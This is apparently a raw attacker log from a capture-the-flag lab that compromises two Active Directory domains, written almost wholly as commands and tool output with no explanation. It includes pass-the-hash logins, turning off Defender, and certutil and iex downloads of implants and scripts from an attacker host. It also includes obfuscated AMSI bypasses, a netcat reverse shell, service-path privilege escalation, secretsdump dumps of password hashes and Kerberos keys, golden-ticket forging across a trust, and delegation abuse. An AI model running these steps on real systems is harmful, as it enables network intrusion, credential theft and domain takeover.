internal.zsm.local\Aron:aes256-cts-hmac-sha1-96:957fd600878eaad5dba70443e42d6a647b0b393211da3e62e55ef5bff965d9bb
internal.zsm.local\Aron:aes128-cts-hmac-sha1-96:26ef49f42cb51e023b50c84e360399eb
internal.zsm.local\Aron:des-cbc-md5:91cef44fc119f119
internal.zsm.local\Matt:aes256-cts-hmac-sha1-96:1877cc1d57a84d334b4a07a77c80086dfb76abe997f0339307efb32429b0deee
internal.zsm.local\Matt:aes128-cts-hmac-sha1-96:a4007666551eebd71856c6833faed374
internal.zsm.local\Matt:des-cbc-md5:2a4a5b467f9bb919
internal.zsm.local\Jamie:aes256-cts-hmac-sha1-96:899a0a57d770ad6510608350b67487beb5c50ac8f3455a1804ff4e8eb85da5e8
internal.zsm.local\Jamie:aes128-cts-hmac-sha1-96:abc87732e5844aafab3c8b355076a959
internal.zsm.local\Jamie:des-cbc-md5:5234a7253bd31f98
smith:aes256-cts-hmac-sha1-96:732bb6606076fbd27885722b4c57d7280e3a972642c34c16bce66814bf64a3b0
smith:aes128-cts-hmac-sha1-96:05b77f34a4406c4029b932e17d62c158
smith:des-cbc-md5:ec2c29e03837b685
ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
ZPH-SVRCDC01$:des-cbc-md5:298c2fb6f823790d
ZPH-SVRCHR$:aes256-cts-hmac-sha1-96:9b37dffd2f9e191262978b8a9cc9b41f782165e4f4709973c9e1e5ada5f80e35
ZPH-SVRCHR$:aes128-cts-hmac-sha1-96:cf8f357935397b6fcf7058e751ffd9e6
ZPH-SVRCHR$:des-cbc-md5:4698c19bbaf8b667
ZPH-SVRCSUP$:aes256-cts-hmac-sha1-96:980035e13beb4c1b68e5071f0b919bf1a11b37cf3573e0a88f0305614fb361d3
ZPH-SVRCSUP$:aes128-cts-hmac-sha1-96:a98bbab60af92f6b8ce9d1f93e9a230c
ZPH-SVRCSUP$:des-cbc-md5:ec7acd5d73fb371f
ZSM-SVRCSQL02$:aes256-cts-hmac-sha1-96:1270026132348b974c1a948cd7b202ae9678b5b3b03cdbdb4be825c1c11f4d71
ZSM-SVRCSQL02$:aes128-cts-hmac-sha1-96:5d3e1581bca6b36aac111bb16bc8e2e1
ZSM-SVRCSQL02$:des-cbc-md5:bf8faba8893475a7
INT-MAINT$:aes256-cts-hmac-sha1-96:7c6282803848f411d9f819642f917bd14a023f3fb66d803868e04faa00c1c859
INT-MAINT$:aes128-cts-hmac-sha1-96:34cc456699aa20c6a3d00433fa959455
INT-MAINT$:des-cbc-md5:aebc7f4368a29885
ZSM$:aes256-cts-hmac-sha1-96:6f9dd2e95b0d477790cf26718e75f022c5743b2aeb2b7b413dcf186eb6c4b290
ZSM$:aes128-cts-hmac-sha1-96:cdf76265a702f0db58aa1081ceadefce
ZSM$:des-cbc-md5:025b3d794357349e
[*] Cleaning up...
psexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f
psexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
wmiexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
powershell -Command "& {Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus}"
\\10.10.14.4\share\SHALLOW_SPADE.exe
certutil -urlcache -split -f http://10.10.14.4:445/SHALLOW_SPADE.exe
SINGLE_SHARK.exe
sliver (SINGLE_SHARK) > cat flag.txt
ZEPHYR{In73rn4l_D0m41n_D0m1n473d} :The Fall
.17
crackmapexec winrm 192.168.210.17 -u 'aron' -p 'ToughPasswordToCrack123!' -d internal.zsm.local
evil-winrm -i 192.168.210.17 -u aron -p 'ToughPasswordToCrack123!'upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 aron ToughPasswordToCrack123! -d internal.zsm.local --remote-impersonation 'c:\users\aron\documents\nc64.exe 10.10.14.4 5985 -e powershell.exe'
$test = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') $test212 = $test.GetField('amsiInitFailed', 'NonPublic,Static') $test212.SetValue($null, $true)
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
iex(iwr http://10.10.14.4:53/PowerUp.ps1 -UseBasicParsing)
iex(iwr http://10.10.14.4:53/Bypass-UAC.ps1 -UseBasicParsing)
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
iex(iwr http://10.10.14.4:53/Invoke-ReflectivePEInjection.ps1 -UseBasicParsing)
`$url = "http://10.10.14.4:53/SINGLE_SHARK.exe"
$binary = (New-Object Net.WebClient).DownloadData($url)
Invoke-ReflectivePEInjection -PEBytes $binary`
iex(iwr http://10.10.14.4:53/large1.ps1 -UseBasicParsing)
powershell -ep bypass [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);Import-Module ./PowerUp.ps1;Invoke-Allchecks
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e internal.zsm.local/ZPH-SVRCHR\$@192.168.210.17
sc.exe qc wuauserv
sc.exe query wuauserv
sc.exe config wuauserv binPath="net localgroup Administrators aron /add"
sc.exe stop wuauserv
sc.exe start wuauserv
exit winrm and relogin
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat flag.txt
ZEPHYR{S3rv1c3_M4n4g3m3nt_f41L5} :tweaked
PS C:\Users\Administrator> cd ..
PS C:\Users> Import-Module ActiveDirectory
PS C:\Users> $domain = Get-ADDomain
PS C:\Users> $domain.DomainSID
BinaryLength AccountDomainSid Value
------------ ---------------- -----
24 S-1-5-21-3056178012-3972705859-491075245 S-1-5-21-3056178012-3972705859-491075245
.12
crackmapexec winrm 192.168.210.12 -u 'jamie' -p 'Password123!'
evil-winrm -i 192.168.210.12 -u jamie -p 'Password123!'
upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 jamie Password123! -d zsm.local --remote-impersonation 'c:\users\jamie\documents\nc64.exe 10.10.14.4 53 -e cmd.exe'
powershell
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
iex(iwr http://10.10.14.4:445/PowerUp.ps1 -UseBasicParsing)
.10
└─$ lookupsid.py internal.zsm.local/Administrator@192.168.210.16 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Brute forcing SIDs at 192.168.210.16
[*] StringBinding ncacn_np:192.168.210.16[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3056178012-3972705859-491075245
500: internal\Administrator (SidTypeUser)
501: internal\Guest (SidTypeUser)
502: internal\krbtgt (SidTypeUser)
512: internal\Domain Admins (SidTypeGroup)
513: internal\Domain Users (SidTypeGroup)
514: internal\Domain Guests (SidTypeGroup)
515: internal\Domain Computers (SidTypeGroup)
516: internal\Domain Controllers (SidTypeGroup)
517: internal\Cert Publishers (SidTypeAlias)
520: internal\Group Policy Creator Owners (SidTypeGroup)
521: internal\Read-only Domain Controllers (SidTypeGroup)
522: internal\Cloneable Domain Controllers (SidTypeGroup)
525: internal\Protected Users (SidTypeGroup)
526: internal\Key Admins (SidTypeGroup)
553: internal\RAS and IAS Servers (SidTypeAlias)
571: internal\Allowed RODC Password Replication Group (SidTypeAlias)
572: internal\Denied RODC Password Replication Group (SidTypeAlias)
1000: internal\ZPH-SVRCDC01$ (SidTypeUser)
1101: internal\DnsAdmins (SidTypeAlias)
1102: internal\DnsUpdateProxy (SidTypeGroup)
1103: internal\ZSM$ (SidTypeUser)
1601: internal\ZPH-SVRCHR$ (SidTypeUser)
1602: internal\ZPH-SVRCSUP$ (SidTypeUser)
└─$ lookupsid.py internal.zsm.local/Administrator@192.168.210.10 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Brute forcing SIDs at 192.168.210.10
[*] StringBinding ncacn_np:192.168.210.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2734290894-461713716-141835440
498: ZSM\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ZSM\Administrator (SidTypeUser)
501: ZSM\Guest (SidTypeUser)
502: ZSM\krbtgt (SidTypeUser)
512: ZSM\Domain Admins (SidTypeGroup)
513: ZSM\Domain Users (SidTypeGroup)
514: ZSM\Domain Guests (SidTypeGroup)
515: ZSM\Domain Computers (SidTypeGroup)
516: ZSM\Domain Controllers (SidTypeGroup)
517: ZSM\Cert Publishers (SidTypeAlias)
518: ZSM\Schema Admins (SidTypeGroup)
519: ZSM\Enterprise Admins (SidTypeGroup)
520: ZSM\Group Policy Creator Owners (SidTypeGroup)
521: ZSM\Read-only Domain Controllers (SidTypeGroup)
522: ZSM\Cloneable Domain Controllers (SidTypeGroup)
525: ZSM\Protected Users (SidTypeGroup)
526: ZSM\Key Admins (SidTypeGroup)
527: ZSM\Enterprise Key Admins (SidTypeGroup)
553: ZSM\RAS and IAS Servers (SidTypeAlias)
571: ZSM\Allowed RODC Password Replication Group (SidTypeAlias)
572: ZSM\Denied RODC Password Replication Group (SidTypeAlias)
1000: ZSM\ZPH-SVRDC01$ (SidTypeUser)
1101: ZSM\DnsAdmins (SidTypeAlias)
1102: ZSM\DnsUpdateProxy (SidTypeGroup)
1104: ZSM\MAINTENANCE$ (SidTypeUser)
1105: ZSM\ZPH-GMSA-ADFS$ (SidTypeUser)
1106: ZSM\ZPH-SVRCA01$ (SidTypeUser)
1107: ZSM\daniel.morris (SidTypeUser)
1108: ZSM\ZPH-SVRADFS1$ (SidTypeUser)
1109: ZSM\PAINTERS$ (SidTypeUser)
1110: ZSM\paul.williams (SidTypeUser)
1601: ZSM\ZPH-SVRSQL01$ (SidTypeUser)
1602: ZSM\internal$ (SidTypeUser)
secretsdump.py internal.zsm.local/Administrator@192.168.210.16 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb1223a009047a376c120c3630a0f0e48
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
internal\ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
internal\ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
internal\ZPH-SVRCDC01$:des-cbc-md5:dc8c893b57c4e0ab
internal\ZPH-SVRCDC01$:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
internal\ZPH-SVRCDC01$:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
[*] NL$KM
0000 07 E9 F2 3F 08 49 46 07 02 CE 30 4B 65 D3 86 32 ...?.IF...0Ke..2
0010 6F 02 5D 36 7D E8 30 33 F4 71 94 44 98 37 CB 1A o.]6}.03.q.D.7..
0020 05 CC 76 F1 26 E2 94 E7 D3 54 78 1F EF BE E9 13 ..v.&....Tx.....
0030 30 3B 62 CB A5 57 75 E6 78 F3 D4 55 5C 68 20 15 0;b..Wu.x..U\h .
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::
internal.zsm.local\mssql_svc:6101:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Emily:6601:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Laura:6602:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Melissa:6603:aad3b435b51404eeaad3b435b51404ee:184260f5bf16a77d67a9d540fda79495:::
internal.zsm.local\Sarah:6604:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Amy:6605:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Steven:6606:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Malcolm:6607:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Aron:6608:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Matt:6609:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Jamie:6610:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
ZPH-SVRCDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
ZPH-SVRCHR$:1601:aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e:::
ZPH-SVRCSUP$:1602:aad3b435b51404eeaad3b435b51404ee:36e7d551e7cb15ca7dad3fd851fc707f:::
ZSM-SVRCSQL02$:5601:aad3b435b51404eeaad3b435b51404ee:ad854719bbb6fc1664316a14cc6eb88d:::
INT-MAINT$:6102:aad3b435b51404eeaad3b435b51404ee:8c0aff2e562402c147dc9650b1eb86cb:::
ZSM$:1103:aad3b435b51404eeaad3b435b51404ee:caa09fc109945e3a5f5237e4a94c2242:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:fbbb5e79da10a8b4609429942c12329391e4af7213e69560893b81c421375f0b
Administrator:aes128-cts-hmac-sha1-96:1f50b00b725eb4ed09a3def4e75ec9f0
Administrator:des-cbc-md5:439ed652fe5b38ae
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16
internal.zsm.local\mssql_svc:aes256-cts-hmac-sha1-96:bea9de16d6775f6ed646cf8e002b2e6845e219f080a709410cb600f909d105ff
internal.zsm.local\mssql_svc:aes128-cts-hmac-sha1-96:4df91cf757b8cb7c5f6e544236293c8d
internal.zsm.local\mssql_svc:des-cbc-md5:5bdf199ee546e6f8
internal.zsm.local\Emily:aes256-cts-hmac-sha1-96:6fac0f47c747960e583ab9cb6d93c31a9425f9a921d246766c2d1a798e10fb56
internal.zsm.local\Emily:aes128-cts-hmac-sha1-96:fbba2f446451e35dd9cbf1d376580e1f
internal.zsm.local\Emily:des-cbc-md5:fd374cc262ec9201
internal.zsm.local\Laura:aes256-cts-hmac-sha1-96:bf6a8feea25df8f1640143c2dc26bc76128748962aef3d5e1c315b8bc7acc8c0
internal.zsm.local\Laura:aes128-cts-hmac-sha1-96:b994efccf32f7827c5ec3a43126a1118
internal.zsm.local\Laura:des-cbc-md5:add68cc23470b0f8
internal.zsm.local\Melissa:aes256-cts-hmac-sha1-96:b09d86e2e6480c2122ee1383f24e592a9642e16470a82bdeb9fff6875d41a922
internal.zsm.local\Melissa:aes128-cts-hmac-sha1-96:289e6d2c65f84c94f185e9755708cf3b
internal.zsm.local\Melissa:des-cbc-md5:982a25f7dc4cb3e9
internal.zsm.local\Sarah:aes256-cts-hmac-sha1-96:81028d54164a46107a6f6b9b0ac9a9216aee0e8d4bce82a3c668d5e1f16774c5
internal.zsm.local\Sarah:aes128-cts-hmac-sha1-96:d130b796b81c66348bc67a95029a19c7
internal.zsm.local\Sarah:des-cbc-md5:29ceaeb664bc2f9e
internal.zsm.local\Amy:aes256-cts-hmac-sha1-96:940adf4174eaaa50218561b87644cdf0210cdecb40ee5b6672312ef39e7f4390
internal.zsm.local\Amy:aes128-cts-hmac-sha1-96:655645f7b62f9d073a00ef7142c8da33
internal.zsm.local\Amy:des-cbc-md5:49e0d6bfd69868b6
internal.zsm.local\Steven:aes256-cts-hmac-sha1-96:9adcb602c37ce0ee4894d74a6575a6f70f7430e8e00446bc0850b787089c4cc4
internal.zsm.local\Steven:aes128-cts-hmac-sha1-96:e9731b435a8651cf11d52d71df936385
internal.zsm.local\Steven:des-cbc-md5:5dce8a52b389e5a2
internal.zsm.local\Malcolm:aes256-cts-hmac-sha1-96:f6e7d8a35afb386c1c271d6a53af85fcf8e306d36f281fdfc2c477c353f62c91
internal.zsm.local\Malcolm:aes128-cts-hmac-sha1-96:4bac2835d8be32ad5dd585ceb7450ef3
internal.zsm.local\Malcolm:des-cbc-md5:26b331256d2fbcd9
internal.zsm.local\Aron:aes256-cts-hmac-sha1-96:957fd600878eaad5dba70443e42d6a647b0b393211da3e62e55ef5bff965d9bb
internal.zsm.local\Aron:aes128-cts-hmac-sha1-96:26ef49f42cb51e023b50c84e360399eb
internal.zsm.local\Aron:des-cbc-md5:91cef44fc119f119
internal.zsm.local\Matt:aes256-cts-hmac-sha1-96:1877cc1d57a84d334b4a07a77c80086dfb76abe997f0339307efb32429b0deee
internal.zsm.local\Matt:aes128-cts-hmac-sha1-96:a4007666551eebd71856c6833faed374
internal.zsm.local\Matt:des-cbc-md5:2a4a5b467f9bb919
internal.zsm.local\Jamie:aes256-cts-hmac-sha1-96:899a0a57d770ad6510608350b67487beb5c50ac8f3455a1804ff4e8eb85da5e8
internal.zsm.local\Jamie:aes128-cts-hmac-sha1-96:abc87732e5844aafab3c8b355076a959
internal.zsm.local\Jamie:des-cbc-md5:5234a7253bd31f98
ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
ZPH-SVRCDC01$:des-cbc-md5:298c2fb6f823790d
ZPH-SVRCHR$:aes256-cts-hmac-sha1-96:9b37dffd2f9e191262978b8a9cc9b41f782165e4f4709973c9e1e5ada5f80e35
ZPH-SVRCHR$:aes128-cts-hmac-sha1-96:cf8f357935397b6fcf7058e751ffd9e6
ZPH-SVRCHR$:des-cbc-md5:4698c19bbaf8b667
ZPH-SVRCSUP$:aes256-cts-hmac-sha1-96:980035e13beb4c1b68e5071f0b919bf1a11b37cf3573e0a88f0305614fb361d3
ZPH-SVRCSUP$:aes128-cts-hmac-sha1-96:a98bbab60af92f6b8ce9d1f93e9a230c
ZPH-SVRCSUP$:des-cbc-md5:ec7acd5d73fb371f
ZSM-SVRCSQL02$:aes256-cts-hmac-sha1-96:1270026132348b974c1a948cd7b202ae9678b5b3b03cdbdb4be825c1c11f4d71
ZSM-SVRCSQL02$:aes128-cts-hmac-sha1-96:5d3e1581bca6b36aac111bb16bc8e2e1
ZSM-SVRCSQL02$:des-cbc-md5:bf8faba8893475a7
INT-MAINT$:aes256-cts-hmac-sha1-96:7c6282803848f411d9f819642f917bd14a023f3fb66d803868e04faa00c1c859
INT-MAINT$:aes128-cts-hmac-sha1-96:34cc456699aa20c6a3d00433fa959455
INT-MAINT$:des-cbc-md5:aebc7f4368a29885
ZSM$:aes256-cts-hmac-sha1-96:d14c3a49f01db9d821a6df62b06dbd209fb39d7164ccf6b994a8fa2473e21e7f
ZSM$:aes128-cts-hmac-sha1-96:0b7cee6e01fd63e61057fac9e26ff52e
ZSM$:des-cbc-md5:7508dc292cbf16b5
[*] Cleaning up...
[*] Stopping service RemoteRegistry
S-1-5-21-3056178012-3972705859-491075245
S-1-5-21-2734290894-461713716-141835440
0540fe51ddd618f42a66ef059ac36441
ticketer.py -nthash 0540fe51ddd618f42a66ef059ac36441 -domain internal.zsm.local -domain-sid S-1-5-21-3056178012-3972705859-491075245 -extra-sid S-1-5-21-2734290894-461713716-141835440-519 Administrator
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for internal.zsm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME=Administrator.ccache
secretsdump.py internal.zsm.local/Administrator@ZPH-SVRDC01.zsm.local -k -no-pass -target-ip 192.168.210.10
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ZSM\ZPH-SVRDC01$:aad3b435b51404eeaad3b435b51404ee:b02f38febbe88d3297f779bf41157502:::
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:84210eddc5724a7801fe78289ee94d44:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8a72936717997f33694d17bd2ce909fe:::
zsm.local\daniel.morris:1107:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
zsm.local\paul.williams:1110:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
zsm.local\marcus:4102:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
zsm.local\ca_svc:4104:aad3b435b51404eeaad3b435b51404ee:7f3e79164258b9aeb22e6aff46a5ee69:::
zsm.local\jamie:4602:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
ZPH-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:b02f38febbe88d3297f779bf41157502:::
MAINTENANCE$:1104:aad3b435b51404eeaad3b435b51404ee:fe00c35591cfa216447f51e436a185d6:::
ZPH-GMSA-ADFS$:1105:aad3b435b51404eeaad3b435b51404ee:4b896425f96da66ebdf84262a2d0296f:::
ZPH-SVRCA01$:1106:aad3b435b51404eeaad3b435b51404ee:251e366fdd64eff18be0824ec7c6833c:::
ZPH-SVRADFS1$:1108:aad3b435b51404eeaad3b435b51404ee:24039a7fd44d8decd80b0897e333ec06:::
ZPH-SVRSQL01$:1601:aad3b435b51404eeaad3b435b51404ee:ecf68b5e132ca80e6864215d5fcbba03:::
ZPH-SVRMGMT1$:4101:aad3b435b51404eeaad3b435b51404ee:89d0b56874f61ad38bad336a77b8ef2f:::
PAINTERS$:1109:aad3b435b51404eeaad3b435b51404ee:9d9c6188ac651f4e58d7a73a929b6644:::
internal$:1602:aad3b435b51404eeaad3b435b51404ee:e0a8f7125ae32c3775ed9ecbb51c8680:::
wmiexec.py zsm.local/Administrator@192.168.210.10 -hashes aad3b435b51404eeaad3b435b51404ee:84210eddc5724a7801fe78289ee94d44
powershell -Command "& {Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus}"
certutil -urlcache -split -f http://10.10.17.0:53/SUBSTANTIAL_CAMPAIGN.exe
SUBSTANTIAL_CAMPAIGN.exe
sliver (SHALLOW_SPADE) > cat flag.txt
ZEPHYR{34t1ng_7h3_B0n3s_0f_N3tw0rks} :Compromised
.14
net group "Enterprise Admins" marcus /add /domain
Add-DomainObjectAcl -TargetIdentity ZPH-SVRADFS1 -PrincipalIdentity marcus -Rights All
addcomputer.py -method LDAPS -computer-name attackersystem -computer-pass 'Summer2018!' -dc-host 192.168.210.10 'zsm.local/marcus:!QAZ2wsx'
└─$ rbcd.py -delegate-from attackersystem$ -delegate-to ZPH-SVRADFS1$ -action 'write' 'zsm.local/marcus:!QAZ2wsx'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem$ can now impersonate users on ZPH-SVRADFS1$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] attackersystem$ (S-1-5-21-2734290894-461713716-141835440-19101)
└─$ getST.py -spn 'cifs/ZPH-SVRADFS1.zsm.local' -impersonate 'Administrator' 'zsm.local/attackersystem$:Summer2018!'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
secretsdump.py ZPH-SVRADFS1.zsm.local -k
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90c9f7848607977407f9afabdb3cfcc0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f97e25e06fa0276f8ac5285638eeeba:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a58eed2cff6a92dd8d2d5b9116be4f:::
[*] Dumping cached domain logon information (domain/username:hash)
ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6: (2023-08-07 19:12:33)
ZSM.LOCAL/ZPH-GMSA-ADFS$:$DCC2$10240#ZPH-GMSA-ADFS$#053f39834953d372785bf479fd947874: (2023-09-22 13:43:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
